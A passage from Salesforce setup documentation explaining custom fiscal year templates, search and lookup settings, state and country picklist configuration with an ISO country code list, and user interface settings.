at any time using the Reset Fiscal Year Structure option.

Choose one of three types of templates:

4 Quarters per Year, 13 Weeks per Quarter

Choose one of these templates for your fiscal year if you want each quarter to have the same number of weeks per quarter.
These templates all have 4 quarters, 12 periods, and 52 weeks per year. Each quarter is 13 weeks long and is composed
of three periods. Two of the periods in each quarter are 4 weeks, and one is 5 weeks. In a 4-4-5 template, for example,
the first and second period of a quarter are 4 weeks long, and the third period is 5 weeks long. Weeks are always 7 days
long. A typical customization for these templates is to add extra weeks for leap years.

4-4-5

Within each quarter, period 1 has 4 weeks, period 2 has 4 weeks, and period 3 has 5 weeks

4-5-4

Within each quarter, period 1 has 4 weeks, period 2 has 5 weeks, and period 3 has 4 weeks

5-4-4

Within each quarter, period 1 has 5 weeks, period 2 has 4 weeks, and period 3 has 4 weeks

13 Periods per Year, 4 Weeks per Period

Choose one of these templates if your fiscal year has more than 12 periods and if one quarter is longer than the other
quarters. These templates all have 4 quarters per year, 13 periods per year, 3 or 4 periods per quarter, 53 weeks per year,
and 4 weeks per period (5 weeks in the final period). Weeks generally have 7 days, but will include a short week at the
end of a year. The most common customization for this type of template is to create or change the length of a short
week.

3-3-3-4

Quarter 1 has 3 periods, quarter 2 has 3 periods, quarter 3 has 3 periods, and quarter 4 has 4 periods

3-3-4-3

Quarter 1 has 3 periods, quarter 2 has 3 periods, quarter 3 has 4 periods, and quarter 4 has 3 periods
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3-4-3-3

Quarter 1 has 3 periods, quarter 2 has 4 periods, quarter 3 has 3 periods, and quarter 4 has 3 periods

4-3-3-3

Quarter 1 has 4 periods, quarter 2 has 3 periods, quarter 3 has 3 periods, and quarter 4 has 3 periods

Gregorian Calendar

12 months/year, standard Gregorian calendar.

Unlike the other template styles, you cannot do advanced customization of a fiscal year that has been created from a
Gregorian calendar template. You should only use this template if you want to create a fiscal year that follows the
Gregorian calendar. This template mimics the functionality of standard fiscal years.

See Also:
About Fiscal Years

Defining a Custom Fiscal Year

Available in: All Editions except for Database.com.

User Permissions Needed

“View Setup and Configuration”To view fiscal year:

“Customize Application”To change your fiscal year:

Before defining a custom fiscal year, enable custom fiscal years for your organization. See Enabling Custom Fiscal Years on
page 227 for more information.

Enabling custom fiscal years does not automatically define them. You must define all of your company's custom fiscal years
so that they fit your company's calendar.

If you have defined a custom fiscal year and you need to change it, you can edit the existing fiscal year definition. Custom
fiscal years cannot be deleted. Instead of deleting an existing fiscal year, edit it until it meets your needs.

Before defining or editing any custom fiscal years, be aware of its impact on forecasting, reports, and other objects by reviewing
About Fiscal Years on page 225.

Defining a New Custom Fiscal Year

To define a new custom fiscal year:

1. From Setup, click Company Profile > Fiscal Year.
2. Click New. The Custom Fiscal Year template dialog opens.
3. Choose a template and click Continue to close the Custom Fiscal Year template dialog. For more information on the

templates, see Choosing a Custom Fiscal Year Template on page 232.
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4. Set the fiscal year start date, the fiscal year name, and choose the week start day. You can also add a description for the
fiscal year.

Note:  If this is the first custom fiscal year you have defined, the Fiscal Year Start Date and the Week
Start Date are set to today's date and day of week. If you have already defined a custom fiscal year, they will
be set to the day after the last end date of your custom fiscal years.

If you need to make changes other than the start date, year name, or week start day, see Customizing the Fiscal Year
Structure on page 228.

5. Optionally, review the fiscal year definition by clicking on Preview.

If it is correct, close the preview and click Save to save your fiscal year, or Save & New to save your fiscal year and define
another fiscal year.

Editing a Custom Fiscal Year

To edit an existing custom fiscal year definition:

1. From Setup, click Company Profile > Fiscal Year.
2. Click a defined fiscal year name to review the details. Close the fiscal year preview to continue.
3. Click Edit for the fiscal year you want to edit.
4. Change the Fiscal Year Start Date, the Fiscal Year Name, Description, or Week Start Day.

If changing the Fiscal Year Start Date causes this fiscal year to overlap with the previous fiscal year, or if it creates
a gap between the fiscal years, the end date of the previous fiscal year will be changed to the day before the start of this
fiscal year.

If changing the end date will cause this fiscal year to overlap the next fiscal year, or if it creates a gap between the fiscal
years, the start date of the next fiscal year will be changed to the day after the end of this fiscal year.

Note:  You cannot change the start or end date of a fiscal year that causes it to overlap with a fiscal year that is
defined using a Gregorian year template.

Warning:  If you change the start or end date of any quarter, period, or week, all forecast data (including quotas,
forecast history, and forecast overrides) that are within that date range, and all forecasts for date ranges automatically
adjusted as a result of that change, will be lost. This includes end or start date changes resulting from inserting or
deleting periods.

5. Click Preview.
6. Review the fiscal year definition. If it is correct, close the preview and click Save to save your fiscal year. If you need to

make more detailed edits, see Customizing the Fiscal Year Structure on page 228.

Note:  Unless you specify them, the fiscal year period labels for forecasting and reporting will be set by the default
label values for the fiscal year periods. If you would like to change them, see Customizing the Fiscal Year Labels
on page 230.
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SET UP SEARCH

Customizing Search Settings
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To modify search settings:

To change your organization's search settings:

1. From Setup, click Customize > Search > Search Settings.
2. Modify the search settings for your organization.
3. Click Save.

Search Settings

The search settings are:

Enable Drop-Down List for Sidebar Search
The drop-down list for sidebar search allows you to limit users' searches by object. When you select Enable Drop-Down
List for Sidebar Search, a drop-down list appears in the Search section. From this list users can select to search
within tags, within a specific object, or across all objects.

Enable “Limit to Items I Own” Search Checkbox
The Limit to Items I Own checkbox allows your users to include only records for which they are the record owner
when entering search queries in the sidebar.

Note:  The Limit to Items I Own checkbox that appears in advanced search is always available to users,
regardless of this setting.

Enable Document Content Search
Enabling Document Content Search allows you to perform a full-text document search. When a new document is
uploaded or an old one is replaced, its contents are available as search terms to retrieve the document.

Enable Search Optimization if your Content is Mostly in Japanese, Chinese, or Korean
Enabling this checkbox optimizes search for the Japanese, Chinese, and Korean languages. It affects sidebar search and
the account search for Find Duplicates on a lead record in sidebar search and global search. Enable this option if users
are searching mostly in Japanese, Chinese, or Korean, and if the text in searchable fields is mostly in those languages.

Do not check this option if you expect content and searches to be mostly in other languages.
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Use Recently Viewed User Records for Blank and Auto-Complete Lookups
If this setting is enabled, the list of records returned from a user auto-complete lookup and from a blank user lookup is
taken from the user's recently viewed user records. This setting applies only to user object lookups and not to lookups
for other objects.

If this setting is not enabled, the dialog shows a list of recently accessed user records from across your organization.

Enable English-Only Spell Correction for Knowledge Search (Beta)
If this setting is enabled, search suggests and searches alternate spellings for English search terms on the Articles and
Article Management tabs, in the articles tool in Case Feed, and in the Salesforce Knowledge sidebar in the Service Cloud
console. This setting applies to article searches via the API but not to article searches in global search.

Enable Sidebar Search Auto-Complete
If this setting is enabled, when users start typing search terms, sidebar search displays a matching list of recently viewed
records.

Note: Global search includes auto-complete and doesn't require a search setting.

Enable Single-Search-Result Shortcut
If this setting is enabled, users skip the search results page and go directly to the record's detail page when their search
returns only a single item.

This setting doesn't apply to tags, case comments (in advanced search), and global search. If the search result is a single
tag, case comment, or item in global search, the search results page still appears.

Number of Search Results Displayed Per Object
The Number of Search Results Displayed Per Object area allows you to configure the number of items that are returned
for each object in the Search Results page. The current setting is in parentheses next to each object. To make changes,
select one or more objects, enter the new number of results per page, and click Save. The new value must be between 5
and 50.

Lookup Settings
The Lookup Settings area allows you to enable enhanced lookups and lookup auto-completion for account, contact,
user, and any custom object lookups.

Customizing Users' Search Results Filters
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To change search layouts:

To customize search result filters for all users:

1. On the Search Results page, in an object's related list, click Customize... > Filters for All Users.

Alternatively, from Setup, click Customize > Object Name > Search Layouts, and click Edit next to Search Filter Fields.
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2. To choose columns, use Add and Remove.
3. To reorder columns, use Up and Down.
4. Click Save.

Note:  Search result filters defined for an object in the internal organization also apply for search results for that object
in communities.

Configuring Lookups
Available in: All Editions except Database.com

Administrators can configure lookups by:

• Enabling enhanced lookups

• Specifying lookup filter fields

• Enabling lookup auto-completion

Enabling Enhanced Lookups

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To enable enhanced lookups:

Enable enhanced lookups so users can use wildcards in their lookups and sort, filter, and page through their results.

1. From Setup, click Customize > Search > Search Settings.
2. In the Lookup Settings area, select the objects for which you want to enable enhanced lookup functionality. Currently,

only account, contact, user, and custom object lookups can use this feature.
3. Click Save.

After enabling enhanced lookups, specify which fields users can use to filter lookup search dialog results. If you don't specify
any fields, your users can't use filters in enhanced lookup dialogs.

Note:  If you enable enhanced lookups in your organization, it is also enabled for any Visualforce pages you create.

See Also:
Configuring Lookups
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Specifying Lookup Filter Fields

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To specify lookup filter fields:

After enabling enhanced lookups, specify which fields users can use to filter lookup search dialog results. If you don't specify
any fields, your users can't use filters in enhanced lookup dialogs.

1. Take the action for the type of object you want.

• For accounts, contacts, or users:

a. From Setup, click Customize.
b. Select Accounts, Contacts, or Users.
c. Click Search Layouts.

• For custom objects:

a. From Setup, click Create > Objects.
b. Click the name of the object you want.
c. Scroll to the Search Layouts related list.

2. Click Edit next to the Lookup Filter Fields layout.
3. Use the arrows to add or remove fields from the layout and to define the order in which the fields should display. You can

add up to six filter fields to the Selected Fields list. To select more than one field, use CTRL+click, or SHIFT+click to
select multiple items in a range.

4. Click Save.

See Also:
Configuring Lookups
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Enabling Lookup Auto-Completion

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To enable lookup auto-completion:

“Edit” on the record that includes the lookup fieldTo use lookup auto-completion:

With lookup auto-completion, users can select items from a dynamic list of matching, recently used records when editing a
lookup field. Lookup auto-completion is available on account, contact, user, and custom object lookups. To enable it:

1. From Setup, click Customize > Search > Search Settings.
2. In the Search Settings area, select the object lookups for which you want to enable auto-completion. Currently, only

account, contact, user, and custom object lookups can use this feature.
3. Click Save.

See Also:
Configuring Lookups

STATE AND COUNTRY PICKLISTS—BETA

State and Country Picklists Overview—Beta
Available in: All Editions except Database.com

State and country picklists allow users to select states and countries from predefined, standardized lists, instead of entering
state and country data into text fields. State and country picklists allow for faster and easier data entry and help to ensure
cleaner data that can be leveraged for other uses—in reports and dashboards, for example—with more dependable results. The
states and countries in the picklists are based on ISO-3166 standard values, making them compatible with other applications
as well.

Note:  This release contains a beta version of state and country picklists that is production quality but has known
limitations. To provide feedback on state and country picklists, go to IdeaExchange.

State and country picklists are available in the shipping, billing, mailing, and “other” address fields in the account, campaign
members, contact, contract, lead, person accounts, quotes, and service contracts standard objects. The picklists are also available
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for managing users and companies in Administration Setup. To use the picklists, first choose the country and then choose
from the options that automatically populate the state or province picklist.

In this beta release, you can use the new picklists in most places that state and country fields are available in Salesforce, including:

• Record edit and detail pages

• List views, reports, and dashboards

• Filters, functions, rules, and assignments

State and country picklists can also be searched, and they’re supported in Translation Workbench.

State and Country Picklist Beta Limitations

In this beta release, 239 countries are provided by default, as well as the states and provinces of the US, Canada, Australia,
Brazil, China, India, Ireland, Italy, and Mexico. State and country picklists do not work with:

• Data.com
• Salesforce to Salesforce
• Salesforce Touch or Salesforce Classic
• Visual Workflow, packaging, or partner portals
• Custom indexes or outbound messages

Implementing State and Country Picklists

The process of transitioning from text-based state and country fields to state and country picklists involves five steps.

1. Configure the state and country values you want to use in your organization.

This step is strongly recommended because it gives you the opportunity to customize state and country values and it ensures
that state and country data will continue to work with any third-party systems you have integrated with Salesforce.

2. Scan your organization’s data and customizations to see how they’ll be affected by the switch.

You probably need to convert data and update such customizations as list views, reports, and workflow rules so they continue
to work with the new field type.

3. Convert existing data.

The conversion process lets you map the various values in your organization to standard picklist values. For example, you
might want to map U.S., USA, and United States to US.

Note:  New organizations include sample account and contact data that you should delete prior to implementing
state and country picklists. From Setup, click Data Management > Mass Delete Records. Then choose the option
to Mass Delete Accounts or Mass Delete Contacts.

4. Turn on the picklists for your users.

If you turn on state and country picklists without configuring the values, scanning your organization, and converting existing
data, users will be able to use the picklists in new records going forward, but all existing data will be incompatible with the
new format, which might compromise data consistency and integrity across the two field formats.

5. Optionally, rescan and fix customizations that might still need updating so that they work with the new picklists.

For a step-by-step guide to implementing state and country picklists, see Implementing State and Country Picklists (Beta).
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Configuring State and Country Picklists
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To configure state and country picklists:

Configuring state and country picklists means choosing which states and countries you want to be available in your Salesforce
organization. It allows you to make state and country picklists available for such purposes as importing data, working with
external systems, and being available in the Metadata API. Configuring picklists is not required for you to actually enable state
and country picklists for users, but it is highly recommended. Configuring picklists helps ensure continuity and data integrity
with existing state and country data and customizations.

When configuring states and countries, you start with countries and drill down to their states or provinces. In this beta release,
239 countries are provided by default, as well as the states and provinces of the US, Canada, Australia, Brazil, China, India,
Ireland, Italy, and Mexico. For the complete list, see Standard Countries for Address Picklists.

Note:  State and country picklists can also be configured through the Metadata API. For more information, read
about the AddressSettings component in the Metadata API Developer's Guide.

1. From Setup, click Data Management > State and Country Picklists.
2. On the State and Country Picklists setup page, click Configure states and countries.
3. Select from the following options:

Active

Makes the country available in the Metadata API so that records can be imported that contain the country. However,
the country will not be available to users in Salesforce.

Visible

Makes the country available to users in picklists, filters, and elsewhere in Salesforce. A country has to be active before
you can make it visible.

4. Click Edit to view and edit details for the country, including to configure its states or provinces.
5. (Optional) Under Picklist Settings, select a Default Country. The Default Country automatically populates country

picklists for new records in your organization, but users can select a different country if they choose. Default countries
must be both active and visible.

6. Click Save to save your configuration.

See Also:
Editing State and Country Details
State and Country Picklists Overview—Beta
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Standard Countries for Address Picklists
Available in: All Editions except Database.com

Standard Countries

The following 239 countries are provided by Salesforce as standard for country address picklists. An asterisk (*) indicates that
states or provinces are available for that country.

CountryISO Code

AndorraAD

United Arab EmiratesAE

AfghanistanAF

Antigua and BarbudaAG

AnguillaAI

AlbaniaAL

ArmeniaAM

AngolaAO

AntarcticaAQ

ArgentinaAR

AustriaAT

Australia*AU

ArubaAW

Aland IslandsAX

AzerbaijanAZ

Bosnia and HerzegovinaBA

BarbadosBB

BangladeshBD

BelgiumBE

Burkina FasoBF

BulgariaBG

BahrainBH

BurundiBI

BeninBJ

Saint BarthélemyBL

BermudaBM
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CountryISO Code

Brunei DarussalamBN

Bolivia, Plurinational State ofBO

Bonaire, Sint Eustatius and SabaBQ

BrazilBR

BahamasBS

BhutanBT

Bouvet IslandBV

BotswanaBW

BelarusBY

BelizeBZ

Canada*CA

Cocos (Keeling) IslandsCC

Congo, the Democratic Republic of theCD

Central African RepublicCF

CongoCG

SwitzerlandCH

Cote d’IvoireCI

Cook IslandsCK

ChileCL

CameroonCM

China*CN

ColombiaCO

Costa RicaCR

CubaCU

Cape VerdeCV

CuraçaoCW

Christmas IslandCX

CyprusCY

Czech RepublicCZ

GermanyDE

DjiboutiDJ

DenmarkDK

DominicaDM
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CountryISO Code

Dominican RepublicDO

AlgeriaDZ

EcuadorEC

EstoniaEE

EgyptEG

Western SaharaEH

EritreaER

SpainES

EthiopiaET

FinlandFI

FijiFJ

Falkland Islands (Malvinas)FK

Faroe IslandsFO

FranceFR

GabonGA

United KingdomGB

GrenadaGD

GeorgiaGE

French GuianaGF

GuernseyGG

GhanaGH

GibraltarGI

GreenlandGL

GambiaGM

GuineaGN

GuadeloupeGP

Equatorial GuineaGQ

GreeceGR

South Georgia and the South Sandwich IslandsGS

GuatemalaGT

Guinea-BissauGW

GuyanaGY

Heard Island and McDonald IslandsHM
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CountryISO Code

HondurasHN

CroatiaHR

HaitiHT

HungaryHU

IndonesiaID

Ireland*IE

IsraelIL

Isle of ManIM

India*IN

British Indian Ocean TerritoryIO

IraqIQ

Iran, Islamic Republic ofIR

IcelandIS

Italy*IT

JerseyJE

JamaicaJM

JordanJO

JapanJP

KenyaKE

KyrgyzstanKG

CambodiaKH

KiribatiKI

ComorosKM

Saint Kitts and NevisKN

Korea, Democratic People’s Republic ofKP

Korea, Republic ofKR

KuwaitKW

Cayman IslandsKY

KazakhstanKZ

Lao People’s Democratic RepublicLA

LebanonLB

Saint LuciaLC

LiechtensteinLI
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CountryISO Code

Sri LankaLK

LiberiaLR

LesothoLS

LithuaniaLT

LuxembourgLU

LatviaLV

Libyan Arab JamahiriyaLY

MoroccoMA

MonacoMC

Moldova, Republic ofMD

MontenegroME

Saint Martin (French part)MF

MadagascarMG

Macedonia, the former Yugoslav Republic ofMK

MaliML

MyanmarMM

MongoliaMN

MacaoMO

MartiniqueMQ

MauritaniaMR

MontserratMS

MaltaMT

MauritiusMU

MaldivesMV

MalawiMW

Mexico*MX

MalaysiaMY

MozambiqueMZ

NamibiaNA

New CaledoniaNC

NigerNE

Norfolk IslandNF

NigeriaNG
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CountryISO Code

NicaraguaNI

NetherlandsNL

NorwayNO

NepalNP

NauruNR

NiueNU

New ZealandNZ

OmanOM

PanamaPA

PeruPE

French PolynesiaPF

Papua New GuineaPG

PhilippinesPH

PakistanPK

PolandPL

Saint Pierre and MiquelonPM

PitcairnPN

Palestinian Territory, OccupiedPS

PortugalPT

ParaguayPY

QatarQA

ReunionRE

RomaniaRO

SerbiaRS

Russian FederationRU

RwandaRW

Saudi ArabiaSA

Solomon IslandsSB

SeychellesSC

SudanSD

SwedenSE

SingaporeSG

Saint Helena, Ascension and Tristan da CunhaSH
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CountryISO Code

SloveniaSI

Svalbard and Jan MayenSJ

SlovakiaSK

Sierra LeoneSL

San MarinoSM

SenegalSN

SomaliaSO

SurinameSR

South SudanSS

Sao Tome and PrincipeST

El SalvadorSV

Sint Maarten (Dutch part)SX

Syrian Arab RepublicSY

SwazilandSZ

Turks and Caicos IslandsTC

ChadTD

French Southern TerritoriesTF

TogoTG

ThailandTH

TajikistanTJ

TokelauTK

Timor-LesteTL

TurkmenistanTM

TunesiaTN

TongaTO

TurkeyTR

Trinidad and TobagoTT

TuvaluTV

Chinese TaipeiTW

Tanzania, United Republic ofTZ

UkraineUA

UgandaUG

United States*US

248

Standard Countries for Address PicklistsSet Up Your Organization



CountryISO Code

UruguayUY

UzbekistanUZ

Holy See (Vatican City State)VA

Saint Vincent and the GrenadinesVC

Venezuela, Bolivarian Republic ofVE

Virgin Islands, BritishVG

Viet NameVN

VanuatuVU

Wallis and FutunaWF

SamoaWS

YemenYE

MayotteYT

South AfricaZA

ZambiaZM

ZimbabweZW

Editing State and Country Details
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To add or edit state or country details:

You can add states and countries to your organization or edit the values of existing states and countries on a state or country’s
detail page. To add or edit a state or province, you have to navigate to its detail page through the detail page of its associated
country.

1. From Setup, click Data Management > State and Country Picklists > Configure states and countries.
2. Click New Country to add a country or click Edit for a listed country.
3. Under Country Information, specify your options.

Country Name

By default, the ISO-standard name. The name is what users see in the Salesforce user interface.

249

Editing State and Country DetailsState and Country Picklists—Beta



Country Code

By default, the two-letter ISO-standard code. If you change an ISO code, the new value must be unique. Codes are
case insensitive and must contain only ASCII characters and numbers. You can’t edit the ISO codes of standard
states or countries.

Integration Value

A text value that corresponds to an ISO-standard state or country code. Salesforce provides default integration values,
which you can edit to match values that you already use in your organization. This allows integrations with external
systems to continue to work.

Active

Makes the country available in the Metadata API so that records can be imported that contain the country. However,
the country will not be available to users in Salesforce.

Visible

Makes the country available to users in Salesforce. A country has to be active before you can make it visible.

4. If you’re adding a country, click Add.
5. If you’re editing a country, specify the options for States:

Active

Makes the state available in the Metadata API so that records can be imported that contain the state. However, the
state will not be available to users in Salesforce.

Visible

Makes the state available to users in picklists, filters, and elsewhere in Salesforce. A state has to be active before you
can make it visible.

6. Click either of the following, if desired.

• New State to add a custom state or province. On the New State page, specify a State Name, State Code, an
Integration Value, and select whether the new state is Active or Visible. Click Add to save the new state.

• Edit to view and edit state or province details, including the State Name, State Code, and Integration Value.

7. Click Save to save your changes.

See Also:
Configuring State and Country Picklists
State and Country Picklists Overview—Beta
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Preparing to Scan State and Country Data and
Customizations

Available in: All Editions except Database.com

Before switching from text-based state and country fields to standardized state and country picklists, scan your organization
to see how it will be affected by the change. This “discovery” process shows you where and how text-based state and country
data appears in your organization, and where it is used in customizations, such as list views and reports. After you’ve analyzed
the findings of the scan, you can plan accordingly to convert data, update your customizations, and turn on state and country
picklists for your users.

Every organization’s discovery process will be unique. For some organizations, transitioning from state and country text fields
to standardized picklists will be straightforward and manageable. For others, it might be a complicated and
time-consuming—even daunting—process if state and country metadata is used extensively throughout the organization.
Salesforce.com recommends that you scan your organization early and often so that you can transition smoothly to the new
lists. Here are some other best practices and known limitations to keep in mind.

• Scanning does not actually convert any data or fix your customizations. You must convert your data separately and update
your customizations individually.

• You can continue to work normally in your organization during the scan.

• The scanning process identifies affected managed packages but doesn’t provide a mechanism for addressing packaging
issues.

• Scanning doesn’t find formulas that include state and country metadata.

• If scanning reveals a validation rule or workflow rule that uses a formula function that makes a comparison on state or
country text fields (for example, BEGINS, CONTAINS, ISCHANGED, or REGEX), you’ll need to use ISPICKVAL to make
comparisons after converting to state and country picklists.

• Scanning doesn’t find personal list views and reports that use state and country metadata. Individual users will have to
update those customizations themselves.

• You can—and should—scan your organization multiple times: After you update a customization, scan again to make sure
your changes fixed the problem and didn’t create any new ones.

See Also:
Scanning State and Country Data and Customizations
State and Country Picklists Overview—Beta
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Scanning State and Country Data and Customizations
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”

AND
“Create Documents”

To scan state and country data and customizations:

Scanning an organization for text-based state and country values reveals where and how text-based state and country data
appears in existing records—for example, you can see all the ways “United States” is saved as a text value, such as “U.S.,” “US,”
“America,” and even misspelled entries like “Untied States.” In addition, scanning shows you where state and country data is
used in customizations, including:

• List views
• Reports
• Validation rules
• Custom buttons and links
• Workflow rules
• Email templates
• Field sets
• Apex classes and triggers
• Visualforce pages

When the scan is complete, you’ll receive two emails with links to detailed reports: one on address data and one on
customizations. After analyzing the reports, you can begin the tasks of converting existing data to picklist values and updating
customizations so they work with the new picklist fields.

1. From Setup, click Data Management > State and Country Picklists.
2. On the State and Country Picklists setup page, click Scan Now and then click Scan.

3. Wait for the results, which will be emailed to you.

Depending on the size and complexity of your organization, it might take a few minutes or a few hours for the results to
be generated.
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Note:  The emails are sent from noreply@salesforce.com. They have the subject line, “Salesforce.com Address
Data Scan” or “Salesforce.com Address Customization Scan.” If you don’t receive the emails, make sure that they
weren’t caught in a spam filter.

4. Click the link in each email to go to a document that contains the report of affected data or customizations.
5. On the Document detail page, click View file.

See Also:
State and Country Picklists Overview—Beta

Preparing to Convert State and Country Data
Available in: All Editions except Database.com

Administrators of Salesforce organizations containing text-based state and country values can convert that data to standardized
picklist values. Converting existing data allows you to keep working with the data after you switch to picklists. Say, for example,
you have a report that culls all of your sales reps’ leads in Washington state, and the report is generated from state picklist
value Washington. To ensure that records with text-based state values such as Wash., WA, and Washington are included in
the report, convert text-based state data to standardized picklist values.

Converting existing state and country text data into standardized picklist values is not required, but doing so preserves and
helps ensure data integrity after picklists are enabled in your organization.

When you convert data, Salesforce starts with countries, then goes on to states. As you go through the conversion process,
here are a few things to keep in mind:

• Save frequently. You can exit the conversion tool and return to it at any time.

• You can continue to work normally in your organization while converting data.
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• You can’t convert data while you’re scanning for affected data and customizations, or while state or country picklists are
being deployed.

• Steps can be repeated and undone at any time until you enable the picklists for users. After the picklists are enabled, you
can’t undo.

See Also:
Converting State and Country Data
State and Country Picklists Overview—Beta

Converting State and Country Data
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To convert text-based state and country data:

Before you convert state and country values in the State and Country Picklists setup, you should configure the picklists for
your organization. That way, when picklists are enabled, all new records created or updated will use your specified integration
value, helping to ensure consistent and accurate data in your organization.

When converting text-based state and country data to picklist-compatible values, you select specific text values and choose
the standard values you want to map them to. For example, you can select all occurrences of “USA” and change them to “United
States.”

You must convert countries first, then states and provinces.

You can convert up to 2,000 country values and up to 2,000 state values.

1. From Setup, click Data Management > State and Country Picklists.
2. On the State and Country Picklists setup page, click Convert now.

Salesforce opens the Convert Countries page, which displays all of the country text values that appear in your organization
and the number of times each value is used.

3. Select Change for one or more values you want to convert. For example, select Change for all the iterations of United
States.

4. In the Change To area, choose the country you want to convert the text values to and click Save to Changelist.

Note:  If you map states or countries to Unknown value, users will see states and counties in their records but
will encounter an error if they try to edit those values. Users can, however, save to a valid value at that point.

5. Repeat Steps 3 and 4 for other country values, such as for Canada.
Salesforce tracks planned changes in the Changelist area.

6. When all of the countries are mapped, click Next to convert state values.

Use the Country of Origin column to identify the country associated with that state or province.

7. On the Confirm Changes page, click Finish to return to the setup overview page or Finish and Enable Picklists to convert
the values and turn on state and country picklists in your organization.
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A few words about undo:

• On the Convert Countries or Convert States page, click Undo at any time to revert values in the changelist.
• On the Convert States page, click Previous to return to the Convert Countries page and change country mappings.
• You can convert state and country values even after clicking Finish. After picklists are enabled, however, you can no longer

edit your conversion mappings.

See Also:
State and Country Picklists Overview—Beta

Enabling and Disabling State and Country Picklists
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To turn state and country picklists on and off:

When you enable state and country picklists, the lists become available to users right away. However, it can take some time
for Salesforce to populate the ISO code fields on existing records. If a user tries to edit the state or country on a record before
the code field is populated, he or she will be prompted to select a code value.

1. From Setup, click Data Management > State and Country Picklists.
2. On the State and Country Picklists setup page, click Enable to turn on the picklists.

Note:  You can also enable state and country picklists when you finish converting existing, text-based data to
picklist values. See Converting State and Country Data.

3. To turn off state and country picklists, click Disable on the State and Country Picklists setup page.
Disabling state and country picklists reverts fields and values to text.

See Also:
State and Country Picklists Overview—Beta
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Customizing User Interface Settings
The available user interface settings vary according to which Salesforce Edition you have.

User Permissions Needed

“Customize Application”To modify user interface settings:

To change your organization's user interface settings:

1. From Setup, click Customize > User Interface.
2. Select or deselect each checkbox to modify the settings for your organization.
3. Click Save.

User Interface Settings
Enable Collapsible Sections

Collapsible sections give users the option to collapse or expand sections on their record detail pages using the arrow icon
next to the section heading. When enabling collapsible sections, make sure your section headings are displayed for each
page layout. Sections remain expanded or collapsed until the user changes his or her settings for that tab. If your
organization has enabled record types, Salesforce remembers a different setting for each record type.

Note:  Call center users won't see incoming calls if they collapse the sidebar.

Show Quick Create
The Quick Create area on a tab home page allows users to create a new record quickly with minimal information. It
displays, by default, on the tab home pages for leads, accounts, contacts, forecasts, and opportunities. You can control
whether the Quick Create area is displayed on all relevant tab home pages.

Note:  The Show Quick Create setting also affects whether or not users can create new records from within
the lookup dialog. For example, with the setting enabled, users can create a new account within the account
lookup dialog while creating or editing a contact. Creating new records in the lookup dialog is available only if
Quick Create is available for your chosen record type. In addition, users always need the appropriate “Create”
permission to use Quick Create even though it will be displayed for all users.

Enable Hover Details
Hover details display an interactive overlay containing detailed information about a record when users hover the mouse
over a link to that record in the Recent Items list on the sidebar or in a lookup field on a record detail page. Users can
quickly view information about a record before clicking View for the record's detail page or Edit for the edit page. The
fields displayed in the hover details are determined by the record's mini page layout. The fields that display in document
hover details are not customizable. This option is enabled by default.

Note:  To view the hover details for a record, users must have the appropriate sharing access to that record, as
well as the necessary field-level security for the fields in the mini page layout.
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Enable Related List Hover Links
Related list hover links display at the top of record detail pages and custom object detail pages in Setup. Users can hover
the mouse over a related list hover link to display the corresponding related list and its number of records in an interactive
overlay that allows users to quickly view and manage the related list items. Users can also click a related list hover link
to jump down to the content of the related list without having to scroll down the page. The Enable Related List
Hover Links checkbox is the default selection.

Enable Separate Loading of Related Lists
When enabled, users see primary record details immediately; as related list data loads, users see a progress indicator.
Separate loading can improve performance on record detail pages for organizations with large numbers of related lists.
This option is disabled by default. Note that this option does not apply to Visualforce pages, user pages, the self-service
portal, or other pages for which you cannot control the layout.

Enable Inline Editing
Inline editing lets users quickly edit field values, right on a record’s detail page. This option is enabled by default and
applies to all users in your organization.

Note:  This doesn't enable inline editing for profiles. Select Enable Enhanced Profile List Views
under Setup.

Enable Enhanced Lists
Enhanced lists give you the ability to quickly view, customize, and edit list data to speed up your daily productivity.
When enabled with the Enable Inline Editing setting, users can also edit records directly from the list, without
navigating away from the page. This option is enabled by default.

Note:  This doesn't enable enhanced lists for profiles. Select Enable Enhanced Profile List Views
under Setup.

Enable New User Interface Theme

Note: Starting with Summer '10, new organizations have the new user interface theme enabled by default.

The new user interface theme updates the look and feel of Salesforce and moves user links, such as Setup and Logout,
under the user name for all users in your organization. The new user interface theme is not supported in Portals or
Console tab.

Only users with supported browsers see the new user interface theme.

Enable Tab Bar Organizer
The Tab Bar Organizer automatically arranges tabs in the main tab bar to prevent horizontal scrolling of the page. It
dynamically determines how many tabs can display based on the width of the browser window and puts tabs that extend
beyond the browser's viewable area into a drop-down list.

Note:  Note the following limitations:

• The Tab Bar Organizer isn’t available with the partner portal or Customer Portal.
• The Tab Bar Organizer is only available with the new user interface theme. Organizations using the old

user interface theme can enable the feature, but it won't be available for users until the new theme is also
enabled.

• The Tab Bar Organizer isn’t available on Internet Explorer 6.
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Enable Printable List Views
Printable list views allow users to easily print list views. If enabled, users can click the Printable View link from any list
view to open a new browser window, displaying the current list view in a simple, print-ready format. The link is located
next to the Help for this Page link in the colored title bar of the page.

Enable Spell Checker
Available in all Editions. When enabled, the Check Spelling button appears in certain areas of the application where
text is entered, such as sending an email, or when creating events, tasks, cases, notes, and solutions. Clicking the button
checks the spelling of your text. Spell Checker does not support all the languages that Salesforce supports. For example,
Spell Checker doesn’t support Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

Enable Spell Checker on Tasks and Events
Available in all Editions. Enables the Check Spelling button when users create or edit tasks or events. The spell checker
analyzes the Description field on events and the Comments field on tasks.

Sidebar Settings
Enable Collapsible Sidebar

The collapsible sidebar gives users the ability to show or hide the sidebar on every page that normally includes the sidebar.
When enabled, the collapsible sidebar becomes available to all users in your organization, but each user can choose his
or her own preference for displaying the sidebar. Users can leave the sidebar visible at all times, or they can collapse the
sidebar and only show it when needed by clicking the edge of the collapsed sidebar.

Tip:  If your organization uses divisions, we recommend that you keep the sidebar pinned and visible at all times
so you always have access to the Divisions drop-down list.

Show Custom Sidebar Components on All Pages
If you have custom home page layouts that include components in the sidebar, this option makes the sidebar components
available on all pages for all users in your organization. If you only want certain users to view sidebar components on all
